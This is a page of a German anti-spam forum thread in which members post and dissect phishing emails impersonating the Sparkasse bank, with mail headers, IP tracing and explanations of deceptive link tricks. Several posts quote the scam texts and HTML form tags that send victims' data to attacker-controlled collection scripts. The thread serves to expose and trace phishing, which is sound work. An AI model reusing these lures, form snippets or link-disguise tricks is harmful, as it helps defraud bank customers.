Seite 21 von 37 ErsteErste ... 11192021222331 ... LetzteLetzte
Ergebnis 201 bis 210 von 370

Thema: Sparkasse (schon wieder)

  1. #201
    Neues Mitglied
    Registriert seit
    17.07.2011
    Beiträge
    7

    Standard

    Ich habe auch eine bekommen....

    header:
    01: Received: from [217.35.86.164] (helo=mail.jsbeverage.com)
    02: by mx38.web.de with esmtp (WEB.DE 4.110 #2)
    03: ID: [ID filtered]
    04: Received: from user ([79.5.168.24]) by mail.jsbeverage.com with Microsoft
    05: SMTPSVC(6.0.3790.4675);
    06: Wed, 20 Jul 2011 xx:xx:xx +0100
    07: From: "Sparkassensuche"<info [at] sparrkassee [dot] com [dot]
    08: de>
    09: Subject: Bitte uberprufen Sie die personlichen Daten
    10: Date: Wed, 20 Jul 2011 04.16.26 +0200
    11: MIME-Version: 1.0
    12: Content-Type: multipart/mixed;
    13: boundary="----=_NextPart_000_0047_01C2A9A6.248B8EC2"
    14: X-Priority: 1
    15: X-MSMail-Priority: High
    16: X-Mailer: Microsoft Outlook Express 6.00.2600.0000
    17: X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
    18: Bcc:
    19: Message-ID: [ID filtered]
    20: X-OriginalArrivalTime: 20 Jul 2011 xx:xx:xx.0828 (UTC)
    21: FILETIME=[B382AC40:01CC4682]
    22: Return-Path: info [at] sparrkassee [dot] com [dot] de
    23: X-EsetID: [ID filtered]

    Inhalt ist folgender:
    Sehr geehrter Kunde,
    Wir Unmut zu verkьnden, dass Ihr Account hat einige Transaktionen, die auf Ihr Bankkonto sperren gefьhrt worden.
    Bitte laden Sie den Anhang und nett zu personenbezogenen Daten zu ьberprьfen.
    Vielen Dank!
    Mit Hochachtung und Respekt
    Wir alle kennen und respektieren
    Sparkasse.de
    Geändert von Mittwoch (23.07.2011 um 21:34 Uhr) Grund: HEADER- und QUOTE-Tags gesetzt, Mailadresse entschärft

  2. #202
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    10.603

    Standard

    Gespamt wurde über Italien whois:79.5.168.24 - der beworbene Link wäre aber noch interessant.

    @Mods:
    Headern und die reply-to-Adresse (gehört Amazon) rausnehmen?
    [Modedit] Danke für den Hinweis, erledigt. [/Modedit]
    Geändert von Mittwoch (23.07.2011 um 21:35 Uhr) Grund: siehe Modedit
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

  3. #203
    Neues Mitglied
    Registriert seit
    17.07.2011
    Beiträge
    7

    Standard

    Der beworbene Link ging komischerweise auf www.sparkasse.de

  4. #204
    Senior Mitglied Avatar von Solli
    Registriert seit
    20.11.2008
    Ort
    Bayern
    Beiträge
    2.072

    Standard

    Was den Link auf sparkasse.de betrifft gibt es drei Möglichkeiten:

    1. Der Link geht ganz wo anders hin, aber der verlinkte Text ist "www.sparkasse.de" (bei HTML-Mails). Beispiel: Der folgende Link führt auf www.example.com, der Text ist aber www.sparkasse.de: [Link nur für registrierte Mitglieder sichtbar. ]

    2. Die verlinkte Seite sieht so ähnlich aus wie sparkasse.de, zum Beispiel www.sparkasse.de.example.com. Wenn hinter dem .de noch 20 Leerzeichen sind sieht man unter Umständen gar nicht, dass es nur eine Subdomain von example.com ist. (In diesem Beispiel könnte es sparrkassee dot com dot de gewesen sein.)

    3. Der Link ist tatsächlich sparkasse.de. Wenn man zusätzlich einen Trojaner hat der die Anfragen entsprechend umleitet (z.B. durch Manipulation der Host-Datei) landet man auf der Betrüger-Seite, ansonsten ganz normal bei der Sparkasse. Mir ist allerdings keine derartige Kombination aus Pharming und Phishing bekannt, denn wenn der Rechner entsprechend kompromittiert ist muss man nur warten bis das Opfer die Adresse selbst eingibt.

    Ich würd also an deiner Stelle nochmal nachsehen ob es nicht 1. oder 2. war.
    Durchgeknallter Netzindianer und stolz drauf

  5. #205
    Mitglied
    Registriert seit
    02.11.2010
    Ort
    Lübeck
    Beiträge
    324

    Standard

    Zitat Zitat von Solli Beitrag anzeigen
    2. Die verlinkte Seite sieht so ähnlich aus wie sparkasse.de, zum Beispiel www.sparkasse.de.example.com. Wenn hinter dem .de noch 20 Leerzeichen sind sieht man unter Umständen gar nicht, dass es nur eine Subdomain von example.com ist. (In diesem Beispiel könnte es sparrkassee dot com dot de gewesen sein.)
    Leerzeichen in subdomains dürften nicht funktionieren. Es gibt noch Möglichkeiten wie [Link nur für registrierte Mitglieder sichtbar. ] oder www: [Link nur für registrierte Mitglieder sichtbar. ] - damit meldet sich im 1. Fall der Benutzer www.sparkasse.de bei der Seite betrug.cn an, im 2. der Benutzer www mit Passwort sparkasse.de bei der Website betrug.ag .
    Oo:..

  6. #206
    Senior Mitglied Avatar von Solli
    Registriert seit
    20.11.2008
    Ort
    Bayern
    Beiträge
    2.072

    Standard

    Ich hab grad festgestellt dass es (noch) gar keine .com.de - Domains gibt und deshalb auch die From-Adresse Unfug ist.

    offtopic:
    OK, das mit den Leerzeichen in der Subdomain stimmt. Was aber geht ist "www.sparkasse.de @example.com".
    Durchgeknallter Netzindianer und stolz drauf

  7. #207
    Diplom Privatier (c) Avatar von cmds
    Registriert seit
    04.05.2006
    Ort
    N 53° 07.274′ E 7° 58.678′
    Beiträge
    12.913

    Standard

    natürlich gibt es eine whois:com.de
    ob da SubDomans vorhanden sind ist erst einmal egal, das Absender im Mail Header gefälscht werden (können) wissen wir hier alle
    Die Signatur befindet sich aus technischen Gründen auf der Rückseite dieses Beitrages!
    Dieser Eintrag wurde extrem umweltfreundlich, aus wiederverwendeten Buchstaben gelöschter E-Mails geschrieben und ist vollständig digital abbaubar.
    „Ich fürchte den Tag, wenn Technologie unsere Wechselbeziehungen beeinflusst, die Welt wird Generationen von Idioten haben.” Albert Einstein 1879-1955
    „Die ältesten Wörter sind die besten und die kurzen die allerbesten." Sir Winston Churchill 1874–1965
    "Nur die Lüge braucht die Stütze der Staatsgewalt, die Wahrheit steht von alleine aufrecht."Thomas Jefferson1743-1826




  8. #208
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Mein Phishki hat auch die Sparkasse nicht vergessen:


    header:
    01: Received: from server.pinkequine.com (server.pinkequine.com [83.170.99.133])
    02: (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
    03: (No client certificate requested)
    04: by xxxxx (Postfix) with ESMTPS ID: [ID filtered]
    05: for xxxxx; Sat, 3 Mar 2012 xx:xx:xx +0100 (CET)
    06: Received: from athedsl-4365945.home.otenet.gr ([79.130.14.105]:4949
    07: helo=User)
    08: by server.pinkequine.com with esmtpa (Exim 4.69)
    09: (envelope-from <kundendienst [at] sparkasse.de>)
    10: ID: [ID filtered]

    Sehr geehrter Kunde,
    Aufgrund unserer jungsten Update auf unseren Servern
    (2012.02.03) und mussen Ihr Profil zu aktualisieren.
    Fur zusatzliche Sicherheit und Zugang, fullen Sie bitte die
    beiliegendem Formular.

    Vielen Dank fur Ihre Mitarbeit.
    Wieder mit HTML-Anhang, und diesmal nicht nur mit BASE64, sondern zusätzlich noch per Javascript verschlüsselt. Nutzt aber trotzdem nichts, hier ist die Schadseite:

    [HTML]<FORM id="FORM1" onsubmit="return submitIt(this)" method="post"
    name="FORM1" action="http://128.8.116.15/tmp/pbs.php">[/HTML]

    IP: 128.8.116.15 ---> University of Maryland
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  9. #209
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Dieselben Kriminellen sind immer noch unterwegs:


    header:
    01: Received: from expotecinc.expotecinc.com ([65.18.174.149]) by mx-ha.gmx.net
    02: (mxgmx002) with ESMTP (Nemesis) ID: [ID filtered]
    03: Fri, 21 Dec 2012 xx:xx:xx +0100
    04: Received: from User ([72.253.152.145])
    05: (authenticated bits=0)
    06: by expotecinc.expotecinc.com (8.13.8/8.13.8) with ESMTP ID: [ID filtered]
    07: Fri, 21 Dec 2012 xx:xx:xx -0500

    IP: 72.253.152.145 ---> Hawaiian Telcom Services Company, Inc.

    Sehr geehrter Kunde,

    Aufgrund unserer jüngsten Update auf unseren Servern
    (22.12.2012) Sie brauchen, um Ihr Profil zu aktualisieren.
    Für zusätzliche Sicherheit und Zugang, füllen Sie bitte die
    beigefügte Formular.

    Vielen Dank für Ihre Mitarbeit.

    © sparkasse.de 2012 Alle Rechte vorbehalten. Vervielfältigung nur mit
    Genehmigung der Sparkassen-Finanzportal GmbH
    Und wieder wird per HTML-Anhang mit demselben Skript gephisht:

    [HTML]<FORM id="FORM1" onsubmit="return submitIt(this)" method="post"
    name="FORM1" action="http://baerundtiger.com/tmp/pbs.php">[/HTML]

    IP: 85.214.85.90 ---> Strato

    also wieder ein Strato-Server (mit Joomla) gecrackt.
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  10. #210
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Und wieder ist die Spasskasse dran:


    header:
    01: Received: from srv01.eventproco.NET (unknown [194.154.135.146])
    02: by xxxxx (Postfix) with ESMTP ID: [ID filtered]
    03: for xxxxx; Mon, 4 Mar 2013 xx:xx:xx +0100 (CET)
    04: X-Brightmail-Tracker: AAAAAhxWjgQHDEsm
    05: Thread-Index: [filtered]
    06: Received: from termsrv.mcoc.local ([50.84.104.226]) by
    07: srv01.eventproco.NET with Microsoft SMTPSVC(6.0.3790.4675); Mon, 4 Mar
    08: 2013 xx:xx:xx +0200

    IP: 194.154.135.146 ---> Primetel PLC, Zypern

    Woran erinnert mich das? Ach, ja:

    [Link nur für registrierte Mitglieder sichtbar. ]

    Da haben wohl nicht nur die Provider schwarze Hüte auf...

    Sehr geehrter Kunde, im vergangenen Jahr wurde die Sparkasse,
    zusammen mit vielen anderen Schweizer Banken, das Ziel eines weit
    verbreiteten Internet-Betruges. Daher haben wir ein Projekt zur
    Bekampfung gestartet. Alle online-Bankkonten sollen auf ein neu
    entwickeltes Sicherheitssystem verbunden werden, welches verdächtige
    Bewegungen und Trends auf Ihrem online-Bankkonto schnell aufgespürt und
    gelöst werden können. Es wurde festgelegt, dass Ihre
    online-Sparkassen-Konto noch nicht mit dem neu entwickelten
    Sicherheitssystem ausgestattet ist und bitten Sie 5-10 Minuten Zeit zu
    investieren um dieses Sicherheitsupdate/Maßnahmen zu vervollständigen.
    Nach dem Update wird sie einer unserer Mitarbeiter kontaktieren, um
    den gesamten Prozess zu vervollstandigen. Wenn der Vorgang abgeschlos
    john2quest: ist, werden Sie wie gewohnt, ihr online-Banking mit der
    Sparkasse verwenden können. Wir wollen Ihnen im Voraus für Ihre
    Mitarbeit danken. SPARKASSE/SPARKASSE SPARKASSE GERMANY Mit
    freundlichen Grüßen, Sparkasse.
    Im HTML-Teil:

    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    IP: 176.9.4.9 ---> static.9.4.9.176.clients.your-server.de/Hetzner

    Wieder mal Hetzner. Wie oft eigentlich noch? Ein Schwarzhut mitten in deutschen Landen (oder ein völlig überfordertes Abuse-Management)...
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

Seite 21 von 37 ErsteErste ... 11192021222331 ... LetzteLetzte

Stichworte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen